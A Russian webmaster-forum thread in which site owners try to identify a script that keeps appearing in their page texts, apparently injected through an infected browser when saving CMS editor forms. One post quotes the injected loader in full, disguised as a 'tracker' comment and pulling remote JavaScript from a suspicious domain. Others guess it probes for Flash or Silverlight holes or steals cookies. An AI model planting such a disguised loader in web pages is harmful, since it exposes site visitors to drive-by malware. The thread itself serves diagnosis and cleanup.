Форум Сайтостроение Безопасность

JS Скрипт

TF-Studio
На сайте с 17.08.2010
Offline
334
TF-Studio
1778

на сайте появляется скрипт в текстах.

пока выясняем каким образом он там находится (редактор, админка, взлом...)

хочется понять что за код

http://vegetatika.ru/t.js

что он делает? на сколько небезопасен

Всё ещё лучший способ заработка для белых сайтов: GoGetLinks (https://www.gogetlinks.net/?inv=fahbn8).
MI
На сайте с 16.07.2008
Offline
74
metadon.info
#1

По идее просто загружает в iframe другой сайт, а там могут быть вирусы или сливают трафик с вашего

LEOnidUKG
На сайте с 25.11.2006
Offline
1723
LEOnidUKG
#2

Там всё просто.

Он подгружает iframe в нём скрипт:

http://sos.vegetatika.ru/

В этом скрипте:

http://sos.vegetatika.ru/iframe.js

Далее упорно ищет флэш плеер или сильвер от IE. Далее закодированный код,скорее всего там урлы прописаны, с которых надо что-то подгружать.

Вполне возможно эти вирусы ищут именно дырки во флэше и в сильвере для подгрузки вируса уже клиенту.

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/
Проверка Cloudflare, хотя я Как менять url без Редиректы со страниц, которых
Tibald
На сайте с 31.05.2008
Offline
101
Tibald
#3

У вас на какой цмс сайт?

У меня сегодня этот скрипт тоже вылез у копирайтера. Но как бы странно, что у меня его не видно. А у нее вставляется в текст сайта описания товара после сохранения wysiwyg редактором.

Т.е. как будто вирус на ее машине, который при редактировании форм через wysiwyg добавляет туда подключение скрипта.

В поиске видно, как люди комментарии оставляли и тоже дописывали этот скрипт.

http://i.imgur.com/BcMPkEx.png

L
На сайте с 30.10.2015
Offline
34
levchernenko
#4

могу ошибаться, но мне кажется, что скрипт куки ворует и во фрейм выгружает

...
K5
На сайте с 21.07.2010
Offline
209
kgtu5
#5

то что он в коде обозначен счетчиком

			<!-- Vegetatika.ru tracker -->
			<script type="text/javascript">
			(function(d,b,ce,ac) {
			var a=d[ce]("script");a.type="text/javascript";a.async=!0;
			a.src="//vegetatika. ru/t.js";d[ac](a);
			})(document,'body','createElement','appendChild');
			</script>
			<!-- /Vegetatika.ru tracker -->

это нормально?

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
TF-Studio
На сайте с 17.08.2010
Offline
334
TF-Studio
#6
Tibald:
У вас на какой цмс сайт?

У меня сегодня этот скрипт тоже вылез у копирайтера. Но как бы странно, что у меня его не видно. А у нее вставляется в текст сайта описания товара после сохранения wysiwyg редактором.

Т.е. как будто вирус на ее машине, который при редактировании форм через wysiwyg добавляет туда подключение скрипта.

В поиске видно, как люди комментарии оставляли и тоже дописывали этот скрипт.
http://i.imgur.com/BcMPkEx.png

Есть такое предположение.

Diafan в данном случае.

но лишь на 1 сайте.

в анонс и текст лезет.

Tibald
На сайте с 31.05.2008
Offline
101
Tibald
#7

Сайт проверил айболитом - чисты.

CMS Prestashop у нее баг вылазил именно при отправке формы.

Когда отправляет форму в хроме - то делается приписка с вставкой скрипта.

Удалила хром, поставила оперу - проблема исправилась.

У нас на сайте текст нигде не вылез, по тому, что Prestashop не давало сохранить форму в таком виде. Так мы и обнаружили сразу проблему эту. Т.е. она сохраняет описание к товару, а ей преста говорит: Не верное поле Description - смотри исходный код поля, а там уже скрипт вставлен) Ну с оперы все норма стало. В хроме - расширений лишних не было , авастовский клинер браузеров не нашел ничего, CureIT тоже ничего не нашел.

А так проверить же легко. Сохраните в редакторе ЦМС текст с того ПК откуда это обычно делается и посмотрите в исходник.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий